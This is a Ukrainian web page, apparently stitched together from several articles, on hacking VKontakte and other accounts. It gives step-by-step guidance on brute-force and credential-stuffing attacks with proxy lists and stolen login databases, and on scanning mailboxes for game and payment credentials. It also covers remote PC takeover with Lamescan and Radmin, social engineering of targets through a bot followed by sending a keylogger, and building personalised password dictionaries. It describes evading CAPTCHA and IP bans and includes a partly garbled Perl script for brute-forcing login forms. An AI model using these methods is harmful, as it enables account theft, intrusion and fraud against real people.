Програми для брутто сторінки вк. Брутфорс перебирає паролі. Видалений злом комп'ютера

💖 Подобається?Поділися з друзями посиланням

Так, існує. Таких програм, загалом кажучи, безліч.

І ми проти таких програм.

Але оскільки на такі програми є якийсь попит, давайте розберемо, які з них діють «відносно» законно, а які краще взагалі не використовувати.
Спочатку існують від самого створення ВКонтакте, наприклад, такі програми, як додатки для брутфорсу.
Такі програми займаються перебором усіх існуючих паролів. І тому використовуються як звичайні алгоритми з покроковим перебором, і т. зв. Rainbow-таблиці, в яких значення розкидані випадково за найкращим розподілом – за задумом авторів останніх програм, Випадковий розподіл може скоротити час пошуку пароля, адже пошук буде йти не з самого початку, а випадково, і в середньому шлях до потрібної літери буде коротшим.
Ми не рекомендуємо користуватись брутфорс-програмами взагалі.Програми для злому вконтакте існують різні, і тому краще не користуватися грубим «вламуванням» на сторінку, до того ж, сам користувач може щось запідозрити і видалити сторінку, завівши іншу, або змінити її адресу. Крім того, адміністрація ВК заблокує Вас по IP і може розпочати судові розгляди за атаку на сервери входу та порушення їх стійкості, а також спробу проникнення в чуже листування.

Отже, програми для злому вконтакті за допомогою брутфорсу є незаконними. Які ще є?

Взагалі, скачати програму для злому вконтакті безкоштовно Ви завжди встигнете. Їх справді безліч. Давайте розберемо які є легальні способи проникнення на чужу сторінку.
Насамперед, це додатки. Програми мають величезну інформацію про користувача. Зазвичай користувачі не читають прохання, які видаються перед запуском програми. А там якраз додатку надається повний доступдо особистих даних, списку друзів, стіни тощо. Особисті повідомлення, звичайно, залишаються для застосування незвіданими, але знаючи колосальний обсяг особистої інформації, до того прихованої за налаштуваннями приватності, можна провертати афери у сфері соціальної інженерії та займатися «виманюванням» інформації про користувача у його найближчих друзів.
Однак і це не зовсім законно – можуть виникнути проблеми, пов'язані з тим, що якщо користувач здогадається, що дані «злило» саме додаток, то він, звичайно ж, подасть на нього скаргу, і програму заблокують.Загалом спосіб хороший, але швидко потрапляє під підозру. Та й робити додаток - морока ще та.
Йдемо далі.

Де можна нормально завантажити програму для злому сторінок вконтакті, яка буде законною?

Насамперед, давайте визначимося – нас влаштовує лише соціальна інженерія. У принципі, за належного використання, соціальна інженерія допоможе нам дістати з користувача всі дані, які нам потрібні, без злому його сторінки. Хоча і отримати повноцінний доступ до сторінки також можна.
Отже, які є соціальні програми для злому вконтакті, завантажити які можна безкоштовно?
Насамперед, варто відзначити бот Бробот.
Його використання для злому, звичайно, є досить дивним методом управління цією програмою, але в принципі, функціональність там необхідна та достатня для злому.
Ми можемо "нацькувати" бота на самого користувача, на його друзів, використовуючи можливості додавання в друзі та особистого листування. Підключимо робота III для розмов, налаштувавши на максимально дружній тон. І після цього вже можна пожинати плоди, дізнаючись про користувача багато цікавого в історії листування, яке зберіг Бробот.
Після цього можна надіслати користувачеві, наприклад, кейлоггер, і ловити те, що він пише іншим користувачам- По суті, особливі програми для злому вконтакте завантажити після цього не доведеться. Достатньо лише стежити за користувачем. Однак і без кейлоггер теж можна обійтися!

Як можуть нам допомогти програми для злому вконтакті на кшталт Бробота?

Насамперед, давайте визначимося з тим, що Бробот не зламує сторінки. Вся наша діяльність абсолютно законна, ніхто не зможе подати на нас до суду, ніхто не зможе заблокувати нас – все абсолютно чесно (у тих межах, в яких це нам потрібно).
Ми просто, по суті, заводимо кілька сторінок (Краще відразу купити безліміт, це гарантовано збільшить обсяг інформації, що видобувається), і з них вже спілкуємося з користувачем, що дозволяє нам дізнатися його ставлення до різних особистостей, а також отримати портрет його самого, його друзів, його родичів і так далі - а саме це, по суті, нам і потрібно.А надалі можна провернути і ще цікавіші та складніші дії, і тут уже все залежить від Ваших бажань та фантазії.
Програма Бробот стане Вашою хорошим помічником, а група підтримки Бробота, доступна майже цілодобово, відповість на Ваші технічні питання.

Брутфорс (походить від англійського словосполучення: brute force) - різновид хакерської атаки - спосіб злому облікових записів комп'ютерні системи, платіжних/банківських сервісах та на веб-сайтах за допомогою автоматизованого підбору комбінацій паролів та логінів.

Брутфорс базується на однойменному математичному методі (brute force), у якому правильне рішення- Кінцеве число або символьна комбінація знаходиться за допомогою перебору різних варіантів. Фактично кожне значення із заданої множини потенційних відповідей (рішень) перевіряється на правильність.

Принцип дії брутфорсу

Хакер пише спеціальну програму для підбору паролів або використовує готове рішення своїх колег. Вона може бути спрямована на певний поштовий сервіс, веб-сайт, соцмережа (тобто призначена для злому конкретного ресурсу). Далі виконується підготовка до злому. Вона складається з наступних етапів:

  1. Складання проксі-листа

З метою приховання справжньої IP-адреси комп'ютера, з якого буде здійснюватись атака, та для запобігання блокуванню з боку сайту, де необхідно зламати обліковий запис, виконується налаштування інтернет-з'єднання через проксі-сервер.

Пошук адрес/портів проксі здійснюється в проксі-грабері (Proxy Grabber). Ця утиліта самостійно витягує всі дані для підключення до серверів-посередників із сайтів, що надають проксі (вони задаються у списку). Іншими словами, виконується збирання проксі.

Отримана база зберігається в окремому текстовому файлі. А потім усі адреси серверів, що є в ній, перевіряються на працездатність у проксі-чекері. Досить часто програми, призначені для автоматизованого видобутку проксі, поєднують функції і граббера, і чекера.

У результаті, виходить готовий проксі лист у вигляді списку IP/порт, збережений у файлі txt. (Він знадобиться під час налаштування програми брутфорс).

  1. Пошук баз для брутто

До брутфорсу необхідно підключити словник - кілька комбінацій паролів і логінів - які він підставлятиме у форму для входу. Він також, як і проксі-лист, має вигляд списку у звичайному текстовому файлі(. Txt). Словники, вони бази, поширюються через хакерські форуми, сайти і файлообмінники. Досвідченіші «умільці» створюють їх самостійно і надають усім бажаючим за певну плату. Чим більша база (кількість комбінацій, логінів, акаунтів), тим краще (для хакера) — тим більша ймовірність успіху злому.

  1. Налаштування брутфорсу

Завантажується проксі лист; програма підбору автоматично змінюватиме проксі, щоб веб-сервер не виявив атаку і, відповідно, джерело (вузол) атаки.

Підключається словник із комбінацій пароль/логін. Встановлюється кількість потоків - скільки одночасно комбінацій брутфорс перевірятиме. Потужний комп'ютерз високою швидкістюІнтернету впевнено справляється зі 120-200 потоками (це оптимальне значення). Від цієї установки безпосередньо залежить швидкість брутто. Наприклад, якщо виставити лише 10 потоків, підбір буде виконуватися дуже повільно.

  1. Запуск брутфорсу

Успішні спроби зламування програма фіксує: зберігає налагоджені акаунти (пароль/логін) у файл. Тривалість процедури підбору коливається від кількох годин за кілька днів. При цьому вона не завжди виявляється результативною - через високу криптостійкість даних для входу або здійснення інших захисних заходів з боку атакованого.

Види брутфорсу

Персональний злам

Полювання за конкретним обліковим записом — у соцмережі, на поштовому сервісі тощо. За допомогою або в процесі віртуального спілкування зловмисник випитує у жертви логін для доступу на сайт. Потім зламує пароль методом підбору: вказує на брутфорс адресу веб-ресурсу та здобутий логін, підключає словник.

Шанси такого злому невеликі, наприклад, у порівнянні з тією ж XSS-атакою. Він може увінчатися успіхом, якщо власник облікового запису використовував пароль з 6-7 символів з невигадливою символьною комбінацією. Інакше на «розгадування» більш стійких варіантів із 12,15, 20 букв, цифр і спецсимволів знадобляться роки — десятки та сотні років, виходячи з розрахунків математичної формулипошуку.

Брут/чек

До брутфорсу підключається база даних із логінами/паролями від поштових скриньок одного поштового сервісу (наприклад, mail.ru) або різних. І проксі лист - для маскування вузла (оскільки за множинними запитами з однієї IP-адреси веб-сервіси електронної поштидосить швидко детектують атаку).

У опціях брутто вказується список ключових слів (як правило, назви сайтів) - орієнтири за якими він шукатиме на зламаних ящиках у листах дані для входу (наприклад: steampowered, worldoftanks, 4game, VK). Або конкретний інтернет-ресурс.

Користувач, реєструючись в онлайн-грі, соцмережі або на форумі, як і належить, вказує свій мейл ( Поштова скринька). Веб-сервіс надсилає повідомлення на вказану адресу з даними для входу та посиланням на підтвердження реєстрації. Саме ці листи і шукає брутфорс, що вивудити з них логіни та паролі.

Натискаєте "СТАРТ" і програма-зломщик починає брутати. Вона діє за таким алгоритмом:

  1. Завантажує з бази логін/пароль до мейлу.
  2. Перевіряє доступ, або «чекає», (автоматично авторизується): якщо вдається в акаунт зайти — плюсує в графі good (гуди) одиницю (означає знайдено ще один робочий мейл) і починає його переглядати (див. наступні пункти); якщо доступу немає – заносить його в bad (беди).
  3. У всіх "гудах" (відкритих мейлах) брутфорс сканує листи за заданим хакером запитом - тобто шукає логіни/паролі до зазначених сайтів та платіжних систем.
  4. При виявленні даних - копіює їх і заносить в окремий файл.

Таким чином, відбувається масовий «викрадення» акаунтів - від десятків до сотень. Здобутими «трофеями» зловмисник розпоряджається вже на власний розсуд — продаж, обмін, збирання даних, крадіжка грошей.

Видалений злом комп'ютера

Брутфорс разом з іншими хакерськими утилітами використовується для отримання віддаленого доступудо запароленого ПК жертви через інтернет-канал

Цей вид атаки складається з наступних етапів:

  1. Виконується пошук IP-мереж, у яких проводитиметься атака на комп'ютери користувачів. Діапазони адрес беруться зі спеціальних баз або за допомогою спеціальних програмнаприклад таких, як IP Geo. У ній можна вибирати IP-мережі за конкретним округом, регіоном і навіть містом.
  2. Відібрані діапазони IP та словники підбору встановлюються в налаштуваннях брутфорсу Lamescan (або його аналога), призначеного для віддаленого брутто логіну/паролю входу в систему. Після запуску Lamescan робить таке:
  • виконує коннект на кожен IP із заданого діапазону;
  • після встановлення зв'язку намагається підключитися до хоста (ПК) через порт 4899 (але можуть бути інші варіанти);
  • якщо порт відкритий: намагається отримати доступ до системи, під час запиту пароля виконує підбір; у разі успіху - зберігає у своїй базі IP-адресу хоста (комп'ютера) та дані для входу.

  1. Хакер запускає утиліту Radmin, призначену для керування віддаленими ПК. Задає мережеві координати жертви (IP, логін та пароль) та отримує повний контроль над системою – робочий стіл (відображається візуально на дисплеї комп'ютера зломщика), файлові директорії, налаштування.

Програми для бруту

HASHCAT

На 2020 рік одна з найпотужніших програм для бруту. Використовує понад 200 алгоритмів перебору. Широко використовується для вибору WPA/WPA2 паролів, а також паролів документів MS Office, PDF, 7-Zip, RAR, TrueCrypt.

Класичний брутфорс, один із найперших. Проте не втрачає своєї актуальності та конкурує з новими рішеннями. Має спритний алгоритм перебору та підтримує всі основні інтернет-протоколи – TCP/IP, POP3, HTTP та ін. Вміє підробляти куки. Брутить за словником і генерує паролі самостійно.

Потужний брут-чекер. Оснащений розширеним арсеналом функцій роботи з базами (перевірка, сортування по доменам). Підтримує різні типипроксі, перевіряє їхню працездатність. Виконує сканування листів у ящиках за такими налаштуваннями, як дата, ключове слово, адреса, непрочитані повідомлення. Може завантажувати листи з Mail.ru та Yandex.

Брутфорс – груба сила, злом перебором
У статті " " було сказано, що зламати вк брутфорсом (програмою) - неможливо.
Це не зовсім так, лазівки все-таки є.
Нижче буде наведено робочий скрипт, але спочатку…

Внизу статті - безкоштовна прога для генерування брут словника та листинг "топ лохівських паролів"

Заздалегідь роблю застереження, що йдеться про класичний «перебір» без будь-яких алгоритмів PBKDF2, без аналізу хешування sha, т.к. на побутовому рівні це непідйомне завдання.

У мережі гуляють безліч програм «для злому ВК перебором (брутом)»

Який вибрати? Яка допоможе (без шкоди мені)?
- Ніяка

Кожен обліковий запис ВК вимагає персонального підходу та шаблонні проги з мережі - це все лажа, розлучення, фуфло.

Зараз самі зрозумієте чому. Мат.частина коротко.

Мінімальна довжина пароля ВК – 6 символів.

Пароль обов'язково має містити:
цифри(0-9 - 10 варіантів),
літери(a-z - 26 в латиниці),
заголовні букви(A-Z - теж 26)

Разом на кожен символ – 10+26+26=62 (!) варіанти, тому кількість комбінацій для:
6-и символьного пароля - 56 800 235 584 (56,8 мільярдів)
7-и символьного пароля - 3521614606208 (3,5 трильйонів)
8-и символьного пароля - 218340105584896 (218 трильйонів)
9-и символьного пароля -13 537 086 546 263 600 (ХЗ як це називається))))

Довжину пароля ми не знаємо, тому брутувати доведеться діапазон хоча б із 6-8 символів
Разом: 6+7+8 символів = 221 918 520 426 688 (222 трильйони) варіантів

Допустимо у вас досить хороший комп'ютер, але виникає питання - скільки запитів до сервера ВК він зможе зробити?
Яка швидкість перебору у домашнього комп'ютера?

Підрахуємо. Для цього відкриємо командний рядок(Пуск - стандартні-командний рядок або запустимо процес cmd.exe)
Вбиваємо команду, отримуємо відповідь сервера

«Відповідь від …..час 134мс» (це у мене, у вас час може відрізнятися)

Час пінгу - це час, за який сигнал іде від нашої машини до сервака і назад.

В одній секунді 1000 мілісекунд (мс), тому
Швидкість брутто з вашої машини (запитів/сек) буде = 1000/час відповіді
У моєму випадку 1000/134мс = 7,4 запиту (пароля) за секунду

Скільки часу забере перебір паролів для ВК?

Нагадаю, що ми перебираємо 221 918 520 426 688 (222 трильйони) варіантів пароля.

Тому, щоб дізнатися скільки ми зламувати пароль ВК перебором ділимо кількість на швидкість, тобто.

221918520426688 пароля / 7,4 пароля в секунду = 29737081737176сек = 495618028953 хв = 8260300483 годин = 344179187 днів = 942957 років

Висновок:реальна програма для злому ВК могла б підібрати пароль за 94 тисячі років.

Питання: А як же відео на ютюбі, в яких чудо-проги лають сторінку ВК за кілька хвилин/годин?
Відповідаю: Це розлучення створене з метою зараження вашого комп'ютера для крадіжки ваших даних. Не більше не менше.

Можна значно прискорити процес перебору!
Для цього потрібно:
1. Підвищити обчислювальну потужність. Наприклад, заразити 1.000.000 чужих комп'ютерів і з усіх одночасно брутувати ВК (аж смішно)
2. Укоротити брут-словник до, наприклад, пари тисяч. (за принципом соціальної інженерії)

Як зробити брут-словник?
1. Ручками у програмі блокнот (notepad.exe)
2. Прогою «генератор брута» (посилання внизу статті)

Цей брут – словник наповнюємо реальними варіантами.

Реальні - це такі, які хоч якось пов'язані з людиною, що зламується:

-телефони(його, його родичів, друзів)
приклад- Номери з +7с, 8кою, без 8ки - трапляється рідко

- дати народження(його, його родичів, близьких)
приклад- (однієї і тієї ж дати) 010118, 01012018, 20180101, 180101 - трапляється часто

- Імена коханих, близьких
приклад- SashaMaria, MariaIvanova, SaNoMaIv - трапляється середньо

Назва сайту (або прізвище) на іншій розкладці
прикладЯкщо набрати слово "vkontakte" на російській розкладці, то вийде - "млщтефлеу" - така схема ну дуже часто трапляється на всіх сайтах.

- лохівський список паролів для брутто(список найпоширеніших паролів у мережі - посилання наприкінці статті)

Чи довго писати словник?Ну, не дуже – півгодини за очі вистачить. А хто сказав, що буде легко?))

Допустимо у нас є створений брут словник та робоча прога для підбору пароля ВК (або ручне введення за словником).

Виникає одна важлива проблема – система захисту сервера.

Власне, перешкода її полягає в тому, що при дуже частих запитах сервер тупо блокує (тимчасово) ваш IP. Крім того, якщо ви працюєте з ВК через стандартну форму введення (HTML\FORM), то після 3 невдалої спробиВК проситиме запровадити капчу.

У старої версіїВК можна було просто перейти на мобільну версію – m.vk.com, тепер же мобільної версіїяк такої немає – у 2016 році зробили єдиний адаптивний дизайн.

Як обійти капчу Вконтакті?

ВК вимагає введення капчі після 3 невдалої спроби (перезавантаження F5 не допомагає), а як він дізнається що це саме виробите кілька спроб входу?

IP
- по куках (cookies), кешу та JavaScript

З куками, кешем та JavaScript немає проблем – їх можна просто відключити в налаштуваннях браузера.

IP можна міняти встановивши прогу по зміні IP - у цьому немає нічого складного, в мережі їх повно (Гугл на допомогу)

Можна користуватися браузером TOR (хто не знає - це браузер для анонімного гуляння по мережі, він змінює IP-шники при кожній новій сесії, корисна штукаособливо для тих хто серфить або працює в САР)

Але майже повністю зводить нанівець усі спроби перебору ГЕОлокації.

Сервер ВК запам'ятовує звідки (географічно) було зроблено останній вхід.

І якщо ваш IP з іншого населеного пункту, то (можливо) вискакуватиме напис:

"Ви намагаєтеся зайти під ім'ям Івана Іванова з незвичайного місця."

Щоб підтвердити, що Ви дійсно є власником сторінки, будь ласка, вкажіть усі цифри номера телефону, до якого прив'язана сторінка.

Скрипт для брутто web-форм (типу, Прога для злому ВК)

Важливо! На сервері ВК стоїть скрипт відстежує частоту відправлення пакетів, тобто. якщо ви довбатимете зі швидкістю N раз/сек - вас автоматично відправлять у бан аркуш по IP.
Також ВК використовує ГЕОстеження.

Без динамічного IP брутувати не варто і намагатися, може допомогти VPN.
Особисто я вважаю перебір паролів ВК справою малоперспективною, але для поціновувачів викладу старенький скрипт на Перлі, запозичений у 5p4x2knet a.k.a. Apocalyptic's і трохи пофіксований.

Скрипт працює методом POST тільки за двома параметрами. loginі пароль.

Якщо логін відомий (наприклад, номер телефону), відповідні поля просто заповніть значення без звернення до словника.

Приховані поля - капчу, картинки скрипт не передасть, приховуйте джерело запитів (себе), як описано вище.

Тут нам знадобиться осудний брут-словник, який ми складали на початку статті. (назвемо його, наприклад, brut.txt )

Також потрібний файл, з якого наша програма отримуватиме інформацію.

Програма вестиме брутфорс всіх скриптів зазначених у цьому файлі. infa.txt). Якщо скрипт один, можна замінити

Звичайно, файл для запису результатів ( result.txt)

Отже,
{
#підключаємо об'єкт
$usagent = LWP::UserAgent
#відкриваємо файл з інформацією (якщо не можемо його відкрити то виходимо);
# скидаємо файл масив @infa і закриваємо. (якщо скрипт один, його можна відразу вказати)
open(INFA, ";"
close(INFA);

#відкриваємо брут-словник
open(BRUT, ";"
close (BRUT);

#відкриття файлу з результатами (дописує до кінця).
open(RESULT, ">>$ARGV");
#початок циклу
foreach $name (@infa)
{
#відділяємо URL, login, змінні та інфу про помилки
($url, $login, $log_vr, $pwd_vr, $failed) = split(//, $name);
#показуємо URL
print "$url...n";
#запуск ще одного циклу
foreach $brut (@brut)
{
#вбиваємо прогалини та переклади рядків
$pss = ~ s / //;
$pss =~ s/n//;

#підключаємо новий об'єкт
$usagent = LWP::UserAgent->new();
# Створення запитів.
$req = HTTP::Request->new(POST=>$url);
$req->content_type("application/x-www-form-urlencoded");
$req->content("$log_vr=$login&$pwd_vr=$pss");

#і його відправка
$result = $usagent -> request($req);
#запис результатів у змінну
$res = $result->content;
#якщо не вийшло формується повідомлення про помилку
if($res!~ /$failed/i)
{
#виведення повідомлення з паролем; запис у результати;
print "brutword found. It isn$pssnn";
print RESULT "URL: $urlnLOGIN: $loginnBRUT: $pssnn";

#інакше продовження підбору
last;
}
}
}
#закриття файлу result.txt
close (RESULT);



Розповісти друзям